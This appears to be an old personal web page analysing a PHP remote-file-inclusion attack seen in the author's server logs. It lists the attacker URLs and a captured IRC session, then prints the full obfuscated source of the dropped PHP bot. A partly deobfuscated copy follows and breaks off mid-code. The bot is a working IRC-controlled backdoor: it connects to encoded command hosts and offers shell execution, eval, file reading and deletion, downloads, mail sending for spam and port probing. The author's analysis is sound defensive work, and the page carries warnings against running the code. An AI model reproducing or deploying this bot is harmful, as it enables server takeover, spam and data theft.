85.69.22.109 - - [19/Mar/2008:06:19:09 +0100] "GET /obforums/viewtopic.php?id=http://myluckypotparty.by.ru/images? HTTP/1.1" 200 2673 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
Apparently this is some attack on buggy PHP scripts to make them download some other page and execute it, since the above URL (myluckypotparty.by.ru/images) is a PHP script being served as text. Other URLs are
viewtopic.php?id=http:// cherrygirl.h18.ru/images/cs.txt? viewtopic.php?id=http:// ninaru.hut2.ru/images/cs.txt? viewtopic.php?id=http:// thepotparty.eclub.lv/images? viewtopic.php?id=http:// holegirl.eclub.lv/.images/pictureofme? viewtopic.php?id=http:// amyru.h18.ru/images/cs.txt? viewtopic.php?id=http:// migirlsadaoiwqiseatmeisum.mail333.su/body? viewtopic.php?id=http:// levispotparty.eclub.lv/images?
(spaces inserted into the URL to discourage search engines from following these links)
My web server scripts don't seem to be vulnerable, but out of curiosity, I tried running the script from an unprivileged account and analyzing the network traffic with Wireshark. Apparently it logs in to an IRC server on IP 121.119.172.49 (naibukansa.info, p4n33123e.dd.blueline.be). I suppose that it will try to get instructions for sending spam. Here is the TCP stream:
PASS secretpass
USER zcxocgdqk 127.0.0.1 localhost :bhmjykgox
NICK bhmjykgox
:hub.58240.net 001 bhmjykgox :bhmjykgox!zcxocgdqk@MY_HOSTNAME.MY_ISP.nl
:hub.58240.net 1 bhmjykgox :Login:
:hub.58240.net 376 bhmjykgox :
MODE bhmjykgox -x+i
JOIN ##p md5hash
MODE bhmjykgox -x+i
JOIN ##p md5hash
:bhmjykgox!zcxocgdqk@pizza.xs4all.nl JOIN :##p
:hub.58240.net 332 bhmjykgox ##p :
:hub.58240.net 353 bhmjykgox @ ##p :bhmjykgox
:hub.58240.net 366 bhmjykgox ##p :
Host Disconnected
<!-- THIS SEEMS TO BE SPAM-RELATED WEB SERVER EXPLOIT CODE - DO NOT RUN THIS CODE -->
<? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
error_reporting(0); ignore_user_abort(); $aec12e0af93cb5 = array ( "po" => 8080, "sp" => "uJijk4iVsIXRmQ==",
"ch" => "aFaw", "ke" => "spd1iYSUqA==", "ha" => "dG1qQk1halK/nE6N", "pa" => "fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=",
"tr" => "*", "mrnd" => 9, "mo" => "cqtrig==", "ve" => "dmFyWA==" ); function tc8a89c2c306fb($m341be97d9aff9) {
$m341be97d9aff9 = str_replace(" ", "", $m341be97d9aff9); return $m341be97d9aff9; } function ob5d21085bf2c0($m341be97d9aff9) {
$m341be97d9aff9 = base64_decode(tc8a89c2c306fb($m341be97d9aff9)); return $m341be97d9aff9; } function rfc35fdc70d5fc() {
global $aec12e0af93cb5; $see11cbb19052e = array(); $td707b8140a662 = ""; $b59b514174bffe = array("sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==","sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR","rpihlYyTr5LWVKHDi6SRl0+jko4=","rZytgpFPr5TDlI7MmW6FiQ==","sKJuhYdPopDTi5bHlKVRhoY=","tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ","vaOokJFUbpPOi5jClLNRhoY=","sqywiZKPpVeMipjHlm6RiZU=","sqytlpaKo5eMipjHlm6RiZU=");
shuffle($b59b514174bffe); if(($j351a1d2ad68bc = fsockopen(jf9feaa9bcab30($b59b514174bffe[0]),$aec12e0af93cb5['po'],$k70106d0d82151,$d809b1abe3f111,15))) {
$m8052146769b14 = ad988971435842($aec12e0af93cb5['mrnd']); if (strlen($aec12e0af93cb5['sp'])>0) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UEFTUw==")." ".jf9feaa9bcab30($aec12e0af93cb5['sp']));
} q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("VVNFUg==")." ".gfb0daa8f01135($aec12e0af93cb5['mrnd'])." 127.0.0.1 localhost :$m8052146769b14");
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); while (!feof($j351a1d2ad68bc)) {
$f7fabc1404929c = trim(fgets($j351a1d2ad68bc,512)); $h6e2baaf3b97db = explode(" ",$f7fabc1404929c);
if(($f7fabc1404929c == $td707b8140a662)) continue; if (isset($h6e2baaf3b97db[0]) && $h6e2baaf3b97db[0] == ob5d21085bf2c0("UElORw==")) {
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UE9ORw==")." ".$h6e2baaf3b97db[1]); } else if (isset($h6e2baaf3b97db[1]) && $h6e2baaf3b97db[1] == ob5d21085bf2c0("MDAx")) {
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TU9ERQ==")." $m8052146769b14 ".jf9feaa9bcab30($aec12e0af93cb5['mo']));
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("Sk9JTg==")." ".jf9feaa9bcab30($aec12e0af93cb5['ch'])." ".jf9feaa9bcab30($aec12e0af93cb5['ke']));
} else if(isset($zdfff0a7fa1a55[1]) && $zdfff0a7fa1a55[1] == ob5d21085bf2c0("NDMz")) { q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14");
} else if (isset($h6e2baaf3b97db[1]) && isset($see11cbb19052e[$h6e2baaf3b97db[1]])) { unset($see11cbb19052e[$h6e2baaf3b97db[1]]);
} else if (isset($h6e2baaf3b97db[1]) && ($h6e2baaf3b97db[1] == ob5d21085bf2c0("UFJJVk1TRw==") || $h6e2baaf3b97db[1] == "332")) {
$n78e731027d8fd = strstr($f7fabc1404929c," :"); $n78e731027d8fd = substr($n78e731027d8fd,2); $zdfff0a7fa1a55 = explode(" ",$n78e731027d8fd);
$m67b3dba8bc677 = $h6e2baaf3b97db[0]; $v7c6483ddcd99e = explode("!",$m67b3dba8bc677); $v7c6483ddcd99e = substr($v7c6483ddcd99e[0],1);
$d73be252ca8221 = FALSE; if ($zdfff0a7fa1a55[0] == "\1".ob5d21085bf2c0("VkVSU0lPTg==")."\1") { q56eacb300613d($j351a1d2ad68bc,"NOTICE ".$v7c6483ddcd99e." :\1".ob5d21085bf2c0("VkVSU0lPTg==")." ".jf9feaa9bcab30($aec12e0af93cb5['ve'])."\1");
} for ($i865c0c0b4ab0e=0;$i865c0c0b4ab0e<count($zdfff0a7fa1a55);$i865c0c0b4ab0e++) { if($zdfff0a7fa1a55[$i865c0c0b4ab0e] == "-s") {
$d73be252ca8221 = TRUE; } } if ($h6e2baaf3b97db[1] == "332") { $e01b6e20344b68 = $h6e2baaf3b97db[3];
} elseif ($h6e2baaf3b97db[2] == $m8052146769b14) { $e01b6e20344b68 = $v7c6483ddcd99e; } else { $e01b6e20344b68 = $h6e2baaf3b97db[2];
} if ($zdfff0a7fa1a55[0] == PHP_OS) { array_shift($zdfff0a7fa1a55); } if (substr($zdfff0a7fa1a55[0],0,1) == $aec12e0af93cb5['tr']) {
if (isset($see11cbb19052e[$m67b3dba8bc677]) || $h6e2baaf3b97db[1] == "332") { switch (substr($zdfff0a7fa1a55[0],1)) {
case l69923efad5b7a("sKM="): if ($h6e2baaf3b97db[1] != "332") { $see11cbb19052e[$m67b3dba8bc677] = FALSE;
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, htmen("b3V0")); } break; case l69923efad5b7a("qGWaoKKb"):
q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UVVJVCA6SSBRVUlU")); fclose($j351a1d2ad68bc); exit(0);
break; case l69923efad5b7a("tpWs"): if (count($zdfff0a7fa1a55)>1) { q56eacb300613d($j351a1d2ad68bc, substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])));
} break; case l69923efad5b7a("sKc="): if (isset($zdfff0a7fa1a55[1])) { $u954eef6d6eac5 = $zdfff0a7fa1a55[1];
} else { $u954eef6d6eac5 = getcwd(); } if (is_dir($u954eef6d6eac5)) { if (($o736007832d216 = opendir($u954eef6d6eac5))) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8gTm93IGxpc3Rpbmc6") ." \2".$u954eef6d6eac5."\2");
while (($k435ed7e9f07f7 = readdir($o736007832d216)) !== FALSE) { if ($k435ed7e9f07f7 != "." && $k435ed7e9f07f7 != "..") {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> (".filetype($u954eef6d6eac5."/".$k435ed7e9f07f7).") $k435ed7e9f07f7");
sleep(1); } } closedir(); } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8gVW5hYmxlIHRvIGxpc3QgY29udGVudHMgb2Y=") . " \2".$u954eef6d6eac5."\2");
} } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RGlyLy8=") . " \2".$u954eef6d6eac5."\2 " . ob5d21085bf2c0("aXMgbm90IGEgZGlyIQ=="));
} break; case l69923efad5b7a("p5Wp"): if (count($zdfff0a7fa1a55) > 1) { if (is_file($zdfff0a7fa1a55[1])) {
if (($k0666f0acdeed3 = fopen($zdfff0a7fa1a55[1],"r"))) { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=") . " \2".$zdfff0a7fa1a55[1]."\2");
while(!feof($k0666f0acdeed3)) { $m6438c669e0d0d = trim(fgets($k0666f0acdeed3,256)); df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> $m6438c669e0d0d");
sleep(1); } df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> [EOF]"); } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8gQ291bGRuJ3Qgb3Blbg==") . " \2".$zdfff0a7fa1a55[1]."\2 for reading.");
} } else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0FULy8=") . " \2".$zdfff0a7fa1a55[1]."\2 " . ob5d21085bf2c0("aXMgbm90IGEgZmlsZQ=="));
} } break; case l69923efad5b7a("tKuZ"): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("UFdELy8gQ3VycmVudCBkaXI6") ." ".getcwd());
break; case l69923efad5b7a("p5g="): if (count($zdfff0a7fa1a55) > 1) { if (chdir($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0QvLyBDaGFuZ2VkIGRpciB0bw==") ." ".$zdfff0a7fa1a55[1]);
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg=="));
} } break; case l69923efad5b7a("tqE="): if (count($zdfff0a7fa1a55) > 1) { if (unlink($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk0vLyBEZWxldGVk") . " \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk0vLyBGYWlsZWQgdG8gZGVsZXRl")." \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("uKOqlZs="): if (count($zdfff0a7fa1a55) > 1) { if (touch($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VG91Y2gvLyBUb3VjaGVk") . " \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=") . " \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("t62inpySoA=="): if (count($zdfff0a7fa1a55) > 2) { if (symlink($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3ltTGluay8vIFN5bWxpbmtlZA==") . " \2".$zdfff0a7fa1a55[2]."\2 To \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3ltTGluay8vIEZhaWxlZCB0byBsaW5r") . " \2".$zdfff0a7fa1a55[2]."\2 To \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("p5ykqaE="): if (count($zdfff0a7fa1a55) > 2) { if (chown($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2hvd24vLyBDaG93bmVk") ." \2".$zdfff0a7fa1a55[1]."\2 To \2".$zdfff0a7fa1a55[2]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=") ." \2".$zdfff0a7fa1a55[1]."\2 To \2".$zdfff0a7fa1a55[2]."\2");
} } break; case l69923efad5b7a("p5yioZc="): if (count($zdfff0a7fa1a55) > 2) { if(chmod($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2htb2QvLyBDaG1vZGRlZA==") . " \2".$zdfff0a7fa1a55[1]."\2 with permissions \2".$zdfff0a7fa1a55[2]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=") . " \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("sZ+Zm6U="): if (count($zdfff0a7fa1a55) > 1) { if (mkdir($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==")." \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ==")." \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("tqGZm6U="): if (count($zdfff0a7fa1a55)>1) { if (rmdir($zdfff0a7fa1a55[1])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==") . " \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ==") . " \2".$zdfff0a7fa1a55[1]."\2");
} } break; case l69923efad5b7a("p6Q="): if (count($zdfff0a7fa1a55) > 2) { if (copy($zdfff0a7fa1a55[1], $zdfff0a7fa1a55[2])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q1AvLyBDb3BpZWQ=") ." \2".$zdfff0a7fa1a55[1]."\2 to \2".$zdfff0a7fa1a55[2]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q1AvLyBGYWlsZWQgdG8gY29weQ==") ." \2".$zdfff0a7fa1a55[1]."\2 to \2".$zdfff0a7fa1a55[2]."\2");
} } break; case l69923efad5b7a("sZWeng=="): if (count($zdfff0a7fa1a55)>4) { $p099fb995346f3 = "From: <".$zdfff0a7fa1a55[2].">\r\n";
if (mail($zdfff0a7fa1a55[1], $zdfff0a7fa1a55[3], substr($n78e731027d8fd,$zdfff0a7fa1a55[4]), $p099fb995346f3)) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TWFpbC8v") . " Message sent to \2".$zdfff0a7fa1a55[1]."\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TWFpbC8v") . " Send failure");
} } break; case l69923efad5b7a("sZ+ilmg="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUQ1Ly8=") . " ".md5($zdfff0a7fa1a55[1]));
break; case l69923efad5b7a("qKKo"): if (isset($zdfff0a7fa1a55[1])) { $m957b527bcfbad = explode(".",$zdfff0a7fa1a55[1]);
if (count($m957b527bcfbad)==4 && is_numeric($m957b527bcfbad[0]) && is_numeric($m957b527bcfbad[1]) && is_numeric($m957b527bcfbad[2]) && is_numeric($m957b527bcfbad[3])) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RE5TLy8=") . " ".$zdfff0a7fa1a55[1]." -> ".gethostbyaddr($zdfff0a7fa1a55[1]));
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RE5TLy8=") . " ".$zdfff0a7fa1a55[1]." -> ".gethostbyname($zdfff0a7fa1a55[1]));
} } break; case l69923efad5b7a("tpmoppSWqQ=="): q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UVVJVCA6UVVJVC4uLg=="));
fclose($j351a1d2ad68bc); rfc35fdc70d5fc(); break; case l69923efad5b7a("tqI="): if(isset($zdfff0a7fa1a55[1])) {
$m8052146769b14 = ad988971435842((int)$zdfff0a7fa1a55[1]); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14");
} else { $m8052146769b14 = ad988971435842($aec12e0af93cb5['mrnd']); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14");
} break; case l69923efad5b7a("tJyl"): if (count($zdfff0a7fa1a55) > 1) { eval(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])));
} break; case l69923efad5b7a("q5mp"): if (count($zdfff0a7fa1a55) > 2) { if (!($k0666f0acdeed3 = fopen($zdfff0a7fa1a55[2],"w"))) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ="));
} else { if (!($eb5eda0a74558a = file($zdfff0a7fa1a55[1]))) { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8gQmFkIFVSTC9ETlMgZXJyb3I="));
} else { for ($i865c0c0b4ab0e = 0; $i865c0c0b4ab0e < count($eb5eda0a74558a); $i865c0c0b4ab0e++) { fwrite($k0666f0acdeed3,$eb5eda0a74558a[$i865c0c0b4ab0e]);
} df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8=") . " \2".$zdfff0a7fa1a55[1]."\2 downloaded to \2".$zdfff0a7fa1a55[2]."\2");
} fclose($k0666f0acdeed3); } } break; case l69923efad5b7a("sp0="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TmV0SW5mby8v") . " IP: ".$_SERVER['SERVER_ADDR']." Hostname: ".$_SERVER['SERVER_NAME']);
break; case l69923efad5b7a("t50="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3lzaW5mby8v") . " [User: ".get_current_user()."] [PID: ".getmypid()."] [Version: PHP ".phpversion()."] [OS: ".PHP_OS."] [Server_software: ".$_SERVER['SERVER_SOFTWARE']."] [Server_name: ".$_SERVER['SERVER_NAME']."] [Admin: ".$_SERVER['SERVER_ADMIN']."] [Docroot: ".$_SERVER['DOCUMENT_ROOT']."] [HTTP Host: ".$_SERVER['HTTP_HOST']."] [URL: ".$_SERVER['REQUEST_URI']."]");
break; case l69923efad5b7a("tKOnpqKUmuw="): if (isset($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) { if (fsockopen($zdfff0a7fa1a55[1],(int)$zdfff0a7fa1a55[2],$t56bd7107802eb,$m341be97d9aff9,5)) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "".ob5d21085bf2c0("UG9ydENoay8v") ." ".$zdfff0a7fa1a55[1].":".$zdfff0a7fa1a55[2]." is \2Open\2");
} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "".ob5d21085bf2c0("UG9ydENoay8v") ." ".$zdfff0a7fa1a55[1].":".$zdfff0a7fa1a55[2]." is \2Closed\2");
} } break; case l69923efad5b7a("uaKWn5g="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VW5hbWUvLw==")." " .php_uname());
break; case l69923efad5b7a("rZg="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("SUQvLw==")." ".getmypid());
break; case l69923efad5b7a("p6GZ"): if (count($zdfff0a7fa1a55)>1) { $p1dccadfed7bcb = popen(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])),"r");
while (!feof($p1dccadfed7bcb)) { $k734515cbd3636 = trim(fgets($p1dccadfed7bcb,512)); if (strlen($k734515cbd3636)>0) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> ".$k734515cbd3636); sleep(1); }
} df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("PiBbRU9GXQ=="));
} break; case l69923efad5b7a("qayalaiYmg=="): h54d54a126a783(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])));
break; } } else { switch(substr($zdfff0a7fa1a55[0],1)) { case l69923efad5b7a("bg=="): if (isset($zdfff0a7fa1a55[1]) && md5($zdfff0a7fa1a55[1]) == jf9feaa9bcab30($aec12e0af93cb5['pa']) && preg_match(jf9feaa9bcab30($aec12e0af93cb5['ha']),$m67b3dba8bc677)) {
df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("UmVhZHkvLyBPaw=="));
$see11cbb19052e[$m67b3dba8bc677] = TRUE; } else { df2f4e964f79d0($j351a1d2ad68bc, FALSE, jf9feaa9bcab30($aec12e0af93cb5['ch']), ob5d21085bf2c0("UmVhZHkvLyByZWplY3RlZA=="));
} break; } } } } $td707b8140a662 = $f7fabc1404929c; } fclose($j351a1d2ad68bc); sleep(3); rfc35fdc70d5fc();
} else { shuffle($b59b514174bffe); rfc35fdc70d5fc(); } } function q56eacb300613d($s317d37b0edc7b, $n78e731027d8fd) {
fwrite($s317d37b0edc7b,"$n78e731027d8fd\r\n"); } function df2f4e964f79d0($s317d37b0edc7b, $d73be252ca8221, $e01b6e20344b68, $n78e731027d8fd) {
if($d73be252ca8221 != TRUE) { q56eacb300613d($s317d37b0edc7b, ob5d21085bf2c0("UFJJVk1TRw==")." $e01b6e20344b68 :$n78e731027d8fd");
} } function l69923efad5b7a($yc7a1ddb19daba) { $lb4a88417b3d01 = ''; $yc7a1ddb19daba = base64_decode($yc7a1ddb19daba);
for($i865c0c0b4ab0e=0; $i865c0c0b4ab0e<strlen($yc7a1ddb19daba); $i865c0c0b4ab0e++) { $ra87deb01c5f53 = substr($yc7a1ddb19daba, $i865c0c0b4ab0e, 1);
$xae0e1268c3859 = substr(ob5d21085bf2c0("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q="), ($i865c0c0b4ab0e % strlen(ob5d21085bf2c0("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q=")))-1, 1);
$ra87deb01c5f53 = chr(ord($ra87deb01c5f53)-ord($xae0e1268c3859)); $lb4a88417b3d01.=$ra87deb01c5f53;
} return $lb4a88417b3d01; } function ad988971435842($wfac65290966c7) { for ($i865c0c0b4ab0e = 0; $i865c0c0b4ab0e < $wfac65290966c7; $i865c0c0b4ab0e++)
$t2cb9df9898e55 .= chr(mt_rand(0,25)+97); if (posix_getegid() == 0) $t2cb9df9898e55 = "r-".$t2cb9df9898e55;
return $t2cb9df9898e55; } function h54d54a126a783($n111ca5df4a68b) { $y9b207167e5381 = ''; if (!empty($n111ca5df4a68b))
{ if(function_exists('exec')) { @exec($n111ca5df4a68b,$y9b207167e5381); $y9b207167e5381 = join("\n",$y9b207167e5381);
} elseif(function_exists('shell_exec')) { $y9b207167e5381 = @shell_exec($n111ca5df4a68b); } elseif(function_exists('system'))
{ @ob_start(); @system($n111ca5df4a68b); $y9b207167e5381 = @ob_get_contents(); @ob_end_clean(); }
elseif(function_exists('passthru')) { @ob_start(); @passthru($n111ca5df4a68b); $y9b207167e5381 = @ob_get_contents();
@ob_end_clean(); } elseif(@is_resource($k8fa14cdd754f9 = @popen($n111ca5df4a68b,"r"))) { $y9b207167e5381 = "";
while(!@feof($k8fa14cdd754f9)) { $y9b207167e5381 .= @fread($k8fa14cdd754f9,1024); } @pclose($k8fa14cdd754f9);
} } return $y9b207167e5381; } function jf9feaa9bcab30($yc7a1ddb19daba) { $lb4a88417b3d01 = ''; $yc7a1ddb19daba = base64_decode($yc7a1ddb19daba);
for($i865c0c0b4ab0e=0; $i865c0c0b4ab0e<strlen($yc7a1ddb19daba); $i865c0c0b4ab0e++) { $ra87deb01c5f53 = substr($yc7a1ddb19daba, $i865c0c0b4ab0e, 1);
$xae0e1268c3859 = substr(ob5d21085bf2c0("M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQhQCNAISMkIyUjJCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU="), ($i865c0c0b4ab0e % strlen(ob5d21085bf2c0("M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQhQCNAISMkIyUjJCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU=")))-1, 1);
$ra87deb01c5f53 = chr(ord($ra87deb01c5f53)-ord($xae0e1268c3859)); $lb4a88417b3d01.=$ra87deb01c5f53;
} return $lb4a88417b3d01; } function gfb0daa8f01135($wfac65290966c7) { $t2cb9df9898e55 = ""; for ($i865c0c0b4ab0e=0;$i865c0c0b4ab0e<$wfac65290966c7; $i865c0c0b4ab0e++)
$t2cb9df9898e55 .= chr(mt_rand(0,25)+97); return $t2cb9df9898e55; } rfc35fdc70d5fc(); ?>
<? php // -*-mode:php-*-
// this seems to be some exploit code that connects to an IRC server. Better not run this script!
set_time_limit(0);
ini_set("max_execution_time", 0);
set_magic_quotes_runtime(0);
ini_set('output_buffering', 0);
error_reporting(0);
ignore_user_abort();
$v1 = array("po" =>8080, "sp" =>'uJijk4iVsIXRmQ==',
"ch" =>'aFaw', "ke" =>'spd1iYSUqA==',
"ha" =>'dG1qQk1halK/nE6N',
"pa" =>'fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=',
"tr" =>"*", 'mrnd' =>9, "mo" =>'cqtrig==',
"ve" =>b64('varX'));
// added by Han-Kwang to improve readability of the code
function b64($s)
{
return base64_encode($s);
}
function
f1($v2)
{
$v2 = str_replace(" ", "", $v2);
return $v2;
}
function
f2($v2)
{
$v2 = base64_decode(f1($v2));
return $v2;
}
function
main()
{
global $v1;
$v3 = array();
$v4 = "";
$v5 =
array('sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==',
'sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR', 'rpihlYyTr5LWVKHDi6SRl0+jko4=',
'rZytgpFPr5TDlI7MmW6FiQ==', 'sKJuhYdPopDTi5bHlKVRhoY=',
'tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ', 'vaOokJFUbpPOi5jClLNRhoY=',
'sqywiZKPpVeMipjHlm6RiZU=', 'sqytlpaKo5eMipjHlm6RiZU=');
shuffle($v5);
if(($v6 = fsockopen(f4($v5[0]), $v1['po'], $v7, $v8, 15)))
{
$v9 = f6($v1['mrnd']);
if(strlen($v1['sp']) > 0)
{
f7($v6, f2(b64('PASS'))." ".f4($v1['sp']));
}
f7($v6,
